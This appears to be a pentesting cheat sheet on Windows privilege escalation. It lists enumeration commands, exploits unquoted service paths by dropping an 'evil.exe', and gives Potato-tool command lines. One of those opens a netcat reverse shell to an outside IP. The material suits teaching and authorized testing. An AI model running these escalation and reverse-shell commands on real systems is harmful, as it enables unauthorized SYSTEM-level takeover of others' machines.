Key Takeaways
- Unquoted service paths allow arbitrary executable injection.
- DLL Hijacking: Replace missing DLLs with malicious ones.
- Potato attacks: NTLM relay for service account escalation.
- Always run WinPEAS/PowerUp for enumeration.
Windows privilege escalation is essential for penetration testers. After gaining initial access, these techniques help escalate from a standard user to Administrator or SYSTEM.
Enumeration Commands
# System info
systeminfo
hostname
whoami /all
# Users and groups
net user
net localgroup Administrators
# Running services
tasklist /SVC
sc query
# AutoRuns
schtasks /query /fo LIST /v
wmic startup get caption,commandUnquoted Service Paths
# Find vulnerable services
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\"
# If path is: C:\Program Files\My App\service.exe
# Windows tries (in order):
# C:\Program.exe
# C:\Program Files\My.exe
# C:\Program Files\My App\service.exe
# Drop malicious executable at writable location
copy evil.exe "C:\Program Files\My.exe"
sc stop VulnService
sc start VulnService # Executes evil.exe as SYSTEM!Token Impersonation (Potato)
# Check privileges
whoami /priv
# Need: SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
# JuicyPotato (Windows Server 2019-)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
# PrintSpoofer (Windows 10/Server 2019+)
PrintSpoofer.exe -i -c cmd
# GodPotato (Universal)
GodPotato.exe -cmd "nc.exe 10.10.10.10 4444 -e cmd"Essential Tools
- WinPEAS: Automated privilege escalation enumeration
- PowerUp: PowerShell privesc scanner
- Seatbelt: Security-focused host survey
- SharpUp: C# port of PowerUp
Frequently Asked Questions
What's the difference between Admin and SYSTEM?
Administrator is the highest user account. SYSTEM is the local machine account with even more privileges—it can access registry hives and perform operations that even Admins can't.
Master all privilege escalation vectors.
Linux PrivEsc Guide